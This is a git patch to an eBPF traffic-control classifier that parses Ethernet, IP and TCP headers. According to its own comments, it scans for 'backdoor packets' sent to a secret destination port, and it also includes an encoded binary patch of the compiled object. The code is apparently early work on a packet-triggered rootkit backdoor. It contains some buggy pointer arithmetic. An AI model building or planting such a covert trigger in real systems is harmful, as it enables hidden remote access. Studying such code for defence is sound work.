From e8abc7415a5ad27683315abbbc5d905c18c26576 Mon Sep 17 00:00:00 2001 From: h3xduck Date: Thu, 14 Apr 2022 07:54:21 -0400 Subject: [PATCH] Advancements on payload recognition. Now proceeding to build protocol --- src/ebpf/include/bpf/tc.c | 34 +++++++++++++++++++--------------- src/tc.o | Bin 2624 -> 3760 bytes 2 files changed, 19 insertions(+), 15 deletions(-) diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c index 8f3eca9..f2bed12 100644 --- a/src/ebpf/include/bpf/tc.c +++ b/src/ebpf/include/bpf/tc.c @@ -18,51 +18,55 @@ int classifier(struct __sk_buff *skb){ //We are interested on parsing TCP/IP packets so let's assume we have one //Ethernet header - struct ethhdr *eth_hdr = data; - if ((void *)eth_hdr + sizeof(struct ethhdr) > data_end){ + struct ethhdr *eth = data; + if ((void *)eth + sizeof(struct ethhdr) > data_end){ bpf_printk("ETH\n"); return TC_ACT_OK; } - if(eth_hdr->h_proto != htons(ETH_P_IP)){ + if(eth->h_proto != htons(ETH_P_IP)){ //Not an IP packet bpf_printk("IP\n"); return TC_ACT_OK; } //IP header - struct iphdr *ip_hdr = (struct iphdr*)(data + sizeof(struct ethhdr)); - if ((void *)ip_hdr + sizeof(struct iphdr) > data_end){ - bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip_hdr, data, data_end); + struct iphdr *ip = (struct iphdr*)(data + sizeof(struct ethhdr)); + if ((void *)ip + sizeof(struct iphdr) > data_end){ + bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip, data, data_end); return TC_ACT_OK; } - if(ip_hdr->protocol != IPPROTO_TCP){ + if(ip->protocol != IPPROTO_TCP){ bpf_printk("TCP\n"); return TC_ACT_OK; } //TCP header - struct tcphdr *tcp_hdr = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); - if ((void *)tcp_hdr + sizeof(struct tcphdr) > data_end){ + struct tcphdr *tcp = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); + if ((void *)tcp + sizeof(struct tcphdr) > data_end){ bpf_printk("TCP CHECK\n"); return TC_ACT_OK; } //We now proceed to scan for our backdoor packets - __u16 dest_port = ntohs(tcp_hdr->dest); + __u16 dest_port = ntohs(tcp->dest); if(dest_port != SECRET_PACKET_DEST_PORT){ bpf_printk("PORT CHECK\n"); return TC_ACT_OK; } - //Mark skb buffer readable and writable - //bpf_skb_pull_data(skb, 0); + bpf_printk("Detected bounds: data:%llx, data_end:%llx", data, data_end); + bpf_printk("Detected headers: \n\teth:%llx\n\tip:%llx\n\ttcp:%llx\n", eth, ip, tcp); - __u32 payload_size = ntohs(ip_hdr->tot_len) - (tcp_hdr->doff * 4) - (ip_hdr->ihl * 4); - char* payload = (void *)(tcp_hdr + tcp_hdr->doff*4); + //Mark skb buffer readable and writable + + __u32 payload_size = ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4); + bpf_printk("ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u\n", ntohs(ip->tot_len), tcp->doff*4, ip->ihl*4); + char* payload = (void *)(tcp + tcp->doff*4); if ((void*)payload + payload_size > data_end){ - bpf_printk("PAYLOAD CHECK\n"); + bpf_printk("PAYLOAD CHECK, payload:%llx, payload_size:%llx, data_end:%llx\n", payload, payload_size, data_end); return TC_ACT_OK; } + bpf_skb_pull_data(skb, 0); bpf_printk("PAYLOAD size: %u\n", payload_size); diff --git a/src/tc.o b/src/tc.o index 54c02b5b055177bbe5f77f87d16971e20d749b6f..9fb45e2f303d61477dec3f2d46d34fbeae769c10 100644 GIT binary patch literal 3760 zcmbtWJ!~9R5T5f7wl9G|K*pR5+CZ$JU@mrmAPf?Y9fKoV$|anzpy1f-t?@b=`|MqV zodW?ygpepOagu^6iXu@X7b#+0geVYIN{S#M(HMjfR8SzyeDmJheOc@);7ND$=G&Rs zdGq)7{jtfHT5>ruD@T7&${CbsV0XG7mhCX*S+dciaQCBMM1srO@fz49Uu5xi+)ru+!VZV1qe|G z+q=27wYAG>VvZD&b3KC5l5`3kmjvC zTFSSRs*}d5dX9QH!rP6LDnF^-w@G{^BwluXl^ke~@&TIpzl&vzzwPvs*b7$oLzTL7 zd3x+|m7h_5foIik>BOlrWE_4$GyCv3wf}wM?=s_OtbA7dxhm`pah~mb-kG4)_mzIo}oA=U^B|rhHdWv+Hum$#((w;~Dlhog2=KFZEsZ7kNH3KSzD`izKeF z6%~FHe!F=x$j_7WNd%df$fS7+F5L?=w6Kcl!e=e4i@o4-QTVj}eoo%IB=xr`JmOQU z1Tzp0xv}gxJk31tC2l-B4qmMy`JbPjK4`~bE|uqarf~>r74d#P4t<+%8^EFn*qYn7=DmRh(C@sd|Wc{=$Blsn}s5 z*y(+n|9H7qRNSf@50PUEx!!JhOu?%1^Bw(sNnAZfhzxQcF^+$Wnf z4}T|lP;>LIghxGkg+G(Ln7N65tLr*JzI+yhQS_T#&*8i)d8tIfIXjPB&i#;gYVL}i zM|UNh2kusfIPYmaV-5kI=y$mO(>#`rzBUQ`#L;8?-ktBO7g^?pc#`I$onDc1H9mv| zo>K@iFXZb0{}3N8OP({SAAAg-AR|=x6jg7IKHY=|gcPpjyN>XIXKm8`PFL zYvME8F!~}QX7SZRxB~H~?B)qqjoH6k;%ZS{PLw-$iaOujmD|m};L{C1vxe0tkzu!` z&okOazf10HfzO3$rB0p;_WDHQGa39njbG#8mH{+H-4d~Ju3LMl zaned}X7DKyVmxENr14KPIN(;;&#e8--zO7JJ>W4Z>mmN%Yss6K_Uh+w2j34=jQ!=9 z(xN}4+Q34n5(b_>7x`3N^uwY*Q<+|L&-xU5MURS6ycoNunXa4#og5h%s6400vx*EJ zVa0hg3xo%Y%!|}B`mv@@X;#z2njOq2YybZ*8D<0jjwavz5)`5@GcU-bPtptwcZ5#M6*qD|Awl25Y@u!-?hRb`NAY zP-tinWg%(rnC;FN=ZS15J8k6Q9u%PkH)C*(aL7KL@?z0SU*1ZV$`6Noa?i0a#4}cI2vAritOH17RJ!7vz-@qKT+v^lf)(f3szp&ic zC@hT(3<(eWr+kO{*&k$;-2Qek&}%C@i0f;fE(C~5|I7A2=MY_V|IK)BR~(1# zqVUM`Owb9S6GxYicHMUwev}0TpWEYg3w4Q^2M)brUG{jbtH7aGtjj6is{@~$sGsgv zmwhbL>p+req^OB|Ua|CxrtM^t%ti(VrH;rWM(XBuYu0_ILVrm-J?SK_GuPn|%PmZ+ z`s8}gv;3Tvd=>l3_h7ru0rcDdT9z^Ut*GhImmFw-$j@_z0b#@RI`qn>lwh0-J z9rUx09q0D{*7mDVr4Gl%|J3ByF{Z;`0VQgsUkH7{{f*hy9l}yOLAP@aEj_b7Jf`Fp z0wtH{>7|vY7a5QIEQ{;-j}2HkbNmGN&&ua#m}T;~{>w(X8`?Qoa6k+5^G>jh&$yy zW515vBJ76GI=_@Lhfw-#u2sa3L*MyGo~j;E>E>BleQRwAJ+N6nOl16u3*vvqx4b?` z@0Z04mET0KOp9oq!niNn~pxenz`vQM>5 z0imh56-JlSh^k2xSECD4vq^9%qE1*1shW0@PB6{%#wF0k`1t755k(FwGIod+ub{ag zJXU31qz>w3O%G^R)BTzqvy}DzKbO?lz{lC-Z<_wzKeQZJ<&)nE!0^p2j#`l^%uQVk z1ULQkO}&h~{&`_on$`OIGek{ZX-Cr*o}D|5|IQTtZT<0z5*XEThM4#b-Ng%-+c`|M zz8$a8Gxl&D1GC$FZUz5#{Cin